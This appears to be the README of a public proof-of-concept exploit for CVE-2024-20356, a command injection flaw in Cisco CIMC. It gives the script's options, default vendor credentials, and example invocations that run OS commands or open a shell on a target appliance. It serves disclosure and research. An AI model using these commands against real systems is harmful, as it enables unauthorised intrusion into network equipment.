## https://sploitus.com/exploit?id=3B8F0A11-0E07-56F5-A79E-68EA089FCC69
# CVE-2024-20356
This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.
Full technical details can be found at [https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom](https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom)
## Usage
Usage: CVE-2024-20356.py [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
-h, --help Show this help message and exit
-t HOST, --host HOST Target hostname or IP address (format or
-u USERNAME, --username USERNAME
Username (default: admin)
-p PASSWORD, --password PASSWORD
Password (default: cisco)
-a ACTION, --action ACTION
Action: test, cmd, shell, dance (default: test)
-c CMD, --cmd CMD OS command to run (Default: NONE)
-v, --verbose Displays more information about cimc
Example commands:
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -v
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a shell
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a dance
Use the `--help` argument for full usage instructions.
## Disclaimer
This proof-of-concept is for demonstration purposes and should not be used for illegal activities. LRQA Nettitude are not responsible for any damage caused by the use or misuse of this code.